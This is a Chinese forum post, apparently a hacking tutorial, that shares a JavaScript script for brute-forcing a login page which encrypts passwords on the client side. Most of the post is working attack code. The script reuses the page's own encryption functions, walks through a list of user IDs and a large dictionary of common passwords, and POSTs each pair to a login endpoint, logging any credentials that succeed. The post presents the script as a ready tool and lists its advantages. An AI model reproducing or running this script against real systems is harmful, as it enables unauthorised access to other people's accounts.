请选择 进入手机版 | 继续访问电脑版
查看: 3814|回复: 0

使用js 脚本爆破自定义加密

[复制链接]
  • TA的每日心情

    昨天 23:06
  • 签到天数: 1299 天

    [LV.10]以坛为家III

    发表于 2021-12-27 16:17:44 | 显示全部楼层 |阅读模式
    优势:
    1. js 加密,再通过js 解密省去了分析加密过程
    2 . 异步速度很快
    3. 无需部署其它环境,一个浏览器就够了

    如网站没引用jquery,须引用外部jquery

    以下为代码部分:
    [AppleScript] 纯文本查看 复制代码
    // [url]http://192.168.1.9:8000/home/Account/LogOn[/url] 
    // 定义用户名部分
    var uids = ["admin","2311","7245","2627","7243","6100","2970","6939","6549","6696","8006","6733","8224","8007","6132"]
    
    // var uids=["admin"]
    //定义密码列表
    var pass = ["!QAZ6yhn","000000","000000000","0000000000","0000000000000000","0123456789","110120119","111111","111111111","1111111111","1111111111111111","123.mima","123123","123123123","1233211234567","1234.com","1234554321","123456","123456.","123456..","123456789","123456789.","123456789..","1234567890","12345678900","1234567891","12345678910","1234567891234567","1234567899","123456789a","123456789abc","123456789q","123456789qq","123456a","123456aa","123456abc","123456asd","123456q","123456qq","123698745","123abc","1314520520","135792468","1357924680","147258369","1472583690","1qaz!QAZ2wsx@WSX","1qaz#EDC5tgb","1qaz2wsx!QAZ@WSX","1qaz@WSX","1qaz@WSX3edc","1qaz@wsx","2wsx#EDC","3edc$RFV","5201314","5201314520","52013145201314","5841314520","5tgb^YHN","6yhn&UJM","741852963","7708801314520","789456123","7894561230","987654321","9876543210","AAA111...","Aa111111","Abc@1234","Abcd1234","Hello01!","Hema1111","MIMA.123","Qwe123!@#","Welcome123","Welcome1234","a123123","a123456","a12345678","a123456789","a5201314","aa123456","aa123456789","aaa123456","abc123","abc123456","abc123456789","abcd123","abcd1234","abcd123456","aini1314","as123456","asd123","asd123456","asdASD123!@#","asdfghjkl","caonima","fir2k7st","mima..123","mima.123","mima.1234","mima.321","mima.456","mima123.","nopass.1","nopass.2","password1!","q123456","q123456789","qaz123456","qazwsxedc","qazxsw.123","qq123456","qq123456789","qq5201314","qwe123","qwe123456","qwe567,.","qwerty","qwertyuiop","w123456","w123456789","wang123456","woaini","woaini123","woaini1314","woaini1314520","woaini520","woaini521","www123456","z123456","z123456789","zxc123","zxc123.0","zxc123456","zxcvbnm","zxcvbnm123"]
    
    var count = uids.length * pass.length
    console.info("[i]INFO: 一共需要请求:"+count+"次\n")
    //定义登录接口
    var url = "http://192.168.1.9:8000/home/account/LogOn"
    
    //请求主体,及表单部分
    function p(url,uid,pass){
      // js密码加密部分
      enpass = do_encrypt_slim(getmd5str(pass)) 
    	$.ajax({
    		url : url,
    		type : "POST",
        async : false,
    		data : {	
    			usercode:uid,
    			password:enpass,
    			phonecheckword:null
    		},
    		success : function(data){
    			if(data.flag != false){
          console.log("%c[+] login successful!\n"+"Loginid:"+uid+"\tpassword:"+pass+"\tusername:\t"+data.username+"\n","color: green")
    			}else{
            console.warn("[-] Login failed !\t当前尝试用户:"+ uid +"\t信息:"+data.msg+"\n")
          }
    		},
        timeout: 1000 //防止卡死
    	});
    }
    
    for (uint =0; uint<=uids.length-1;uint++){
      for (i = 0; i<=pass.length-1;i++){
        p(url,uids[uint],pass[i]);
         
      }
    }


    效果图

    Fjtr7YsJZ2h_I4edDk1bVsEDJQDu.png
    回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    快速回复 返回顶部 返回列表